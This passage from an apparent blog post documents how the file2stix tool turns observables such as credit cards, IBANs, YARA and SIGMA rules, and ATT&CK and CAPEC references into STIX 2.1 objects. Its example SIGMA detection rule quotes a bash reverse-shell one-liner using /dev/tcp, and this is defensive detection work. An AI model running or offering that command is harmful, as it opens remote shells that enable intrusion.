All STIX objects reported by the cve2stix API for the CPE ID are imported to file2stix;
GET https://www.cve2stix.com/api/v1/cpe/<CPE ID>
The software object returned in the CPE response should have a relationship generated by file2stix to the report.
Note, this response might contain the same software objects as those returned for CVEs, in which case each software object should only be included once in the resulting bundle.
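Including each software object only once amounts to de-duplicating objects by their STIX `id` before they go into the bundle. A minimal sketch, with a hypothetical function name and made-up example IDs:

```python
from typing import Dict, Iterable, List


def merge_unique(*object_lists: Iterable[dict]) -> List[dict]:
    """Combine lists of STIX objects, keeping the first object seen for each id."""
    seen: Dict[str, dict] = {}
    for objects in object_lists:
        for obj in objects:
            seen.setdefault(obj["id"], obj)
    return list(seen.values())


# Illustrative responses only; the IDs below are invented for the example.
cve_objects = [
    {"type": "software", "id": "software--11111111-1111-4111-8111-111111111111"},
    {"type": "vulnerability", "id": "vulnerability--22222222-2222-4222-8222-222222222222"},
]
cpe_objects = [
    {"type": "software", "id": "software--11111111-1111-4111-8111-111111111111"},
]

bundle_objects = merge_unique(cve_objects, cpe_objects)
print([obj["id"] for obj in bundle_objects])
```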
16. Country Observables (CountryName and CountryCode)
STIX 2.1 location SDO
{
"type": "location",
"spec_version": "2.1",
"id": "location--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"name": "Country: <EXTRACTED / CONVERTED FULL COUNTRY NAME OBSERVABLE VALUE>",
"country": "<EXTRACTED / CONVERTED COUNTRY ISO OBSERVABLE VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
Note, in the case of Country Name extractions, the country name needs to be converted to a two-character ISO 3166-1 alpha-2 code for the country property.
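The conversion can be pictured as a two-way lookup between country names and alpha-2 codes. The table below is a tiny hypothetical sample (a real lookup would cover the full ISO 3166-1 list), and the function name is an assumption for illustration:

```python
from typing import Optional

# Hypothetical sample of the name -> ISO 3166-1 alpha-2 lookup.
NAME_TO_CODE = {"France": "FR", "Germany": "DE", "Japan": "JP"}
CODE_TO_NAME = {code: name for name, code in NAME_TO_CODE.items()}
LOWERCASE_NAMES = {name.lower(): name for name in NAME_TO_CODE}


def location_fields(extracted: str) -> Optional[dict]:
    """Return the name and country properties for a country name or code."""
    text = extracted.strip()
    if text.upper() in CODE_TO_NAME:          # CountryCode extraction
        code = text.upper()
    elif text.lower() in LOWERCASE_NAMES:     # CountryName extraction
        code = NAME_TO_CODE[LOWERCASE_NAMES[text.lower()]]
    else:
        return None
    return {"name": f"Country: {CODE_TO_NAME[code]}", "country": code}


print(location_fields("france"))
print(location_fields("JP"))
```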
17. Credit Card Observables (CreditCardMastercard, CreditCardVisa, CreditCardAmex, CreditCardUnionPay, CreditCardDiners, CreditCardJCB, CreditCardDiscover)
- indicator (with relationship to report)
- credit-card (with relationship to indicator)
- extension-definition
STIX 2.1 extension-definition
As STIX 2.1 does not natively have an object for credit cards, file2stix uses a custom SCO;
https://raw.githubusercontent.com/signalscorps/stix2-objects/main/extension-definition/new-sco/credit-card
STIX 2.1 credit-card SCO
{
"type": "credit-card",
"spec_version": "2.1",
"id": "credit-card--<GENERATED BY STIX2 LIBRARY>",
"issuer": "<CREDIT CARD TYPE>",
"number": "<CREDIT CARD NUMBER>",
"extensions": {
"extension-definition--abd6fc0e-749e-4e6c-a20c-1faa419f5ee4" : {
"extension_type" : "new-sco"
}
}
}
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "<CARD TYPE> Credit Card: <EXTRACTED CREDIT CARD OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ credit-card:number = '<EXTRACTED CREDIT CARD OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
18. Bank Account Observables (IBAN)
- indicator (with relationship to report)
- bank-account (with relationship to indicator)
- extension-definition
STIX 2.1 extension-definition
As STIX 2.1 does not natively have an object for IBANs, file2stix uses a custom SCO;
https://raw.githubusercontent.com/signalscorps/stix2-objects/main/extension-definition/new-sco/bank-account/
STIX 2.1 bank-account SCO
{
"type": "bank-account",
"spec_version": "2.1",
"id": "bank-account--<GENERATED BY STIX2 LIBRARY>",
"iban_number": "<FULL IBAN NUMBER INCLUDING COUNTRY CODE>",
"extensions": {
"extension-definition--349c1029-4052-4635-a064-263cb17290ea": {
"extension_type" : "new-sco"
}
}
}
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "Bank account: <EXTRACTED IBAN OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ bank-account:iban_number = '<EXTRACTED IBAN OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
19. YARA Rule Observables (YaraRule)
e.g.
rule dummy
{
condition:
false
}
YARA rules can be identified using pattern matching as they always start with rule and end with }.
- indicator (with relationship to report)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "YARA Rule: <RULE NAME>",
"pattern_type": "yara",
"pattern": "<YARA RULE>",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
The YARA rule is first encoded with JSON escapes before it is saved in the pattern value. e.g.
rule dummy\r\n{\r\n condition:\r\n false\r\n}
The <RULE NAME> is defined between the text rule and the first { (e.g. dummy in the last example).
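A short sketch of both steps, pulling the rule name from between `rule` and the first `{`, and letting a JSON serializer produce the escapes. The regular expression and function name are assumptions for illustration rather than file2stix's actual implementation.

```python
import json
import re

# The rule name is the identifier between the keyword 'rule' and the first '{'.
RULE_NAME = re.compile(r"\brule\s+(\w+)[^{]*\{")


def yara_indicator_fields(rule_text: str) -> dict:
    """Build the YARA-specific indicator properties from the raw rule text."""
    match = RULE_NAME.search(rule_text)
    if match is None:
        raise ValueError("no YARA rule header found")
    return {
        "name": f"YARA Rule: {match.group(1)}",
        "pattern_type": "yara",
        "pattern": rule_text,
    }


rule = "rule dummy\r\n{\r\n    condition:\r\n        false\r\n}"
fields = yara_indicator_fields(rule)
print(fields["name"])
# json.dumps applies the JSON escapes (\r\n and so on) when serializing.
print(json.dumps(fields["pattern"]))
```

Keeping the raw rule in memory and escaping only at serialization time avoids double-escaping the pattern.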
20. SIGMA Rule Observables (indicator)
e.g.
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: experimental
description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
date: 2021/10/16
author: Florian Roth
logsource:
    product: linux
    category: network_connection
detection:
    selection:
        Image|endswith: '/bin/bash'
    filter:
        DestinationIp:
            - '127.0.0.1'
            - '0.0.0.0'
    condition: selection and not filter
SIGMA Rules are detected if valid YAML containing the three top-level fields title, logsource and detection is present. If all three field names are detected, the entire YAML content is ingested as the SIGMA rule.
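The three-field check can be approximated as follows. This sketch only looks for unindented `key:` lines and does not validate the YAML itself; a fuller implementation would load the text with a YAML parser first. The function name is hypothetical.

```python
import re

REQUIRED_FIELDS = {"title", "logsource", "detection"}

# A top-level YAML key starts at column 0 and is followed by a colon.
TOP_LEVEL_KEY = re.compile(r"^([A-Za-z_][\w-]*):", re.MULTILINE)


def looks_like_sigma_rule(text: str) -> bool:
    """True if all three required top-level fields are present in the text."""
    top_level_keys = set(TOP_LEVEL_KEY.findall(text))
    return REQUIRED_FIELDS <= top_level_keys


sample = "\n".join(
    [
        "title: Linux Reverse Shell Indicator",
        "status: experimental",
        "logsource:",
        "    product: linux",
        "detection:",
        "    selection:",
        "        Image|endswith: '/bin/bash'",
        "    condition: selection",
    ]
)
print(looks_like_sigma_rule(sample))
```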
- indicator (with relationship to report)
- extension-definition
STIX 2.1 extension-definition
https://github.com/signalscorps/stix2-objects/tree/main/extension-definition/property-extension/file2stix-sigma-rule-extension-indicator-sdo/
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "SIGMA Rule: <SIGMA RULE TITLE>",
"pattern_type": "sigma",
"pattern": "<SIGMA RULE>",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "Sigma Rule Reference",
"url": "<SIGMA RULE REFERENCES[0]>"
},
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
],
"extensions": {
"extension-definition--94f4bdb6-7f39-4d0a-b103-f787026963a6": {
"extension_type": "property-extension",
"sigma_rule": {
"title": "<SIGMA RULE TITLE>",
"id": "<SIGMA RULE ID>",
"date": "<SIGMA RULE DATE>",
"modified": "<SIGMA RULE MODIFIED>",
"related": [
{
"id": "<SIGMA RULE RELATED.ID[0]>",
"type": "<SIGMA RULE RELATED.TYPE[0]>"
}
],
"status": "<SIGMA RULE STATUS>",
"description": "<SIGMA RULE DESCRIPTION>",
"license": "<SIGMA RULE LICENSE>",
"author": "<SIGMA RULE AUTHOR>",
"references": [
"<SIGMA RULE REFERENCES[0]>"
],
"fields": [
"<SIGMA RULE FIELDS[0]>"
],
"falsepositives": [
"<SIGMA RULE FALSEPOSITIVES[0]>"
],
"level": "<SIGMA RULE LEVEL>",
"tags": [
"<SIGMA RULE TAGS[0]>"
],
"logsource": {
"category": "<SIGMA RULE LOGSOURCE.CATEGORY>",
"product": "<SIGMA RULE LOGSOURCE.PRODUCT>",
"service": "<SIGMA RULE LOGSOURCE.SERVICE>",
"definition": "<SIGMA RULE LOGSOURCE.DEFINITION>"
},
"detection": [
"<SIGMA RULE DETECTION[0]>"
]
}
}
}
}
The SIGMA rule is encoded with JSON escapes before being written into the pattern value. e.g.
title: Linux Reverse Shell Indicator\r\nid: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871\r\nstatus: experimental\r\ndescription: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& \/dev\/tcp\/10.0.0.1\/4242 0>&1')\r\ndate: 2021\/10\/16\r\nauthor: Florian Roth\r\nlogsource:\r\n product: linux\r\n category: network_connection\r\ndetection:\r\n selection:\r\n Image|endswith: '\/bin\/bash'\r\n filter:\r\n DestinationIp: \r\n - '127.0.0.1'\r\n - '0.0.0.0'\r\n condition: selection and not filter
The <SIGMA RULE TITLE> is defined by the value in the title: field of the YAML rule.
21. MITRE ATT&CK Observables
file2stix is designed to identify ATT&CK data found in text using keyword matches on the name, external_references.external_id (where "source_name": "mitre-attack" for Enterprise ATT&CK or "source_name": "mitre-mobile-attack" for Mobile ATT&CK) and x_mitre_aliases (when it exists) fields inside the STIX object representing it.
Take the ATT&CK sub-technique T1053.005: Scheduled Task.
You will see;
"name": "Scheduled Task",
and
{
"source_name": "mitre-attack",
"external_id": "T1053.005",
"url": "https://attack.mitre.org/techniques/T1053/005"
},
Therefore, the dictionary entries to identify this ATT&CK Object are Scheduled Task and T1053.005 (case insensitive).
The following ATT&CK data types from the Enterprise, Mobile, and ICS matrices are supported in this way;
- Techniques (attack-pattern)
- Sub-Technique (attack-pattern)
- Tactic (x-mitre-tactic)
- Course of Action (course-of-action)
- Intrusion Set (intrusion-set)
- Malware (malware)
- Tool (tool)
- Data Sources (x-mitre-data-source)
In the case of a dictionary match to a MITRE ATT&CK STIX Object, no new object is actually created. Instead, a new Relationship Object is created between the STIX Report SDO and the imported ATT&CK STIX Object. The ATT&CK STIX Object remains unmodified.
For example, if the uploaded text contained T1053.005 it would match the ATT&CK Object T1053.005: Scheduled Task and an SRO would be created between the Report SDO and this Attack Pattern SDO.
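The dictionary approach can be sketched as two small steps: collect the lookup entries from an ATT&CK STIX object, then search the text for any of them, ignoring case. The function names are hypothetical, and the object below is trimmed to the properties used for matching.

```python
import re
from typing import List

ATTACK_SOURCE_NAMES = ("mitre-attack", "mitre-mobile-attack")


def dictionary_entries(stix_object: dict) -> List[str]:
    """Collect name, ATT&CK external IDs and aliases (when present)."""
    entries = [stix_object["name"]]
    for reference in stix_object.get("external_references", []):
        if reference.get("source_name") in ATTACK_SOURCE_NAMES and "external_id" in reference:
            entries.append(reference["external_id"])
    entries.extend(stix_object.get("x_mitre_aliases", []))
    return entries


def text_matches(text: str, stix_object: dict) -> bool:
    """Case-insensitive whole-term match of any dictionary entry in the text."""
    for entry in dictionary_entries(stix_object):
        if re.search(r"(?<!\w)" + re.escape(entry) + r"(?!\w)", text, re.IGNORECASE):
            return True
    return False


scheduled_task = {
    "type": "attack-pattern",
    "name": "Scheduled Task",
    "external_references": [
        {
            "source_name": "mitre-attack",
            "external_id": "T1053.005",
            "url": "https://attack.mitre.org/techniques/T1053/005",
        }
    ],
}

print(dictionary_entries(scheduled_task))
print(text_matches("Persistence was achieved via t1053.005.", scheduled_task))
```

On a match, only a relationship to the report would need to be created; the ATT&CK object itself is reused as imported.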
22. MITRE CAPEC Observables
CAPECs are extracted in a very similar way to ATT&CK objects, using a dictionary.
file2stix can identify CAPEC data found in text using keyword matches on the name and external_references.external_id (where "source_name": "capec") fields inside the STIX object representing it.
Take CAPEC-170 Web Application Fingerprinting.
You will see;
"name": "Web Application Fingerprinting",
and
{
"external_id": "CAPEC-170",
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/170.html"
},
Therefore, the dictionary entries to identify this CAPEC Object are Web Application Fingerprinting and CAPEC-170 (case insensitive).
The following CAPEC data types are supported in this way;
- CAPEC (attack-pattern)
In the case of a dictionary match to a MITRE CAPEC STIX Object, no new object is created. Instead, a new Relationship Object is created between the STIX Report SDO and the imported CAPEC STIX Object. The CAPEC STIX Object remains unmodified.
For example, if the uploaded text contained CAPEC-170 it would match to the CAPEC Object CAPEC-170 Web Application Fingerprinting and an SRO would be created between the Report SDO and this Attack Pattern SDO.
23. Custom Extractions (regex and lookups)
You can also write your own custom extractions using either exact text matches (lookups) or regular expressions. This is described in the “Lookups vs Regular Expressions” part earlier in this post.
Logging
file2stix has 2 logging modes;
- DEBUG: contains details of user settings entered, all extraction logs, and specific details (e.g. stack traces) of any errors.
- PROD: contains details of user settings entered, and all extraction logs (inc. basic error details).
Log files can be found in the root directory ($FILE2STIX_path) as follows;
$FILE2STIX_path/log/<TIMESTAMP>_<REPORT_ID>.log
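For scripts that need to locate a report's log, the path can be assembled as in this sketch. The timestamp format is an assumption (the post does not specify it), as are the function name and example values.

```python
import os
from datetime import datetime, timezone
from typing import Optional


def log_file_path(base_path: str, report_id: str, now: Optional[datetime] = None) -> str:
    """Build <base_path>/log/<TIMESTAMP>_<REPORT_ID>.log."""
    now = now or datetime.now(timezone.utc)
    timestamp = now.strftime("%Y%m%dT%H%M%SZ")  # assumed timestamp format
    return os.path.join(base_path, "log", f"{timestamp}_{report_id}.log")


# base_path stands in for the value of $FILE2STIX_path.
print(log_file_path("/opt/file2stix", "report--<REPORT OBJECT ID>"))
```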
Up next: The file2stix API
So far I’ve explained how the backend of file2stix works. This file2stix functionality is exposed to users via an API.
In the next post I will explain the design decisions that went into the API and how it is structured for the expected use-cases.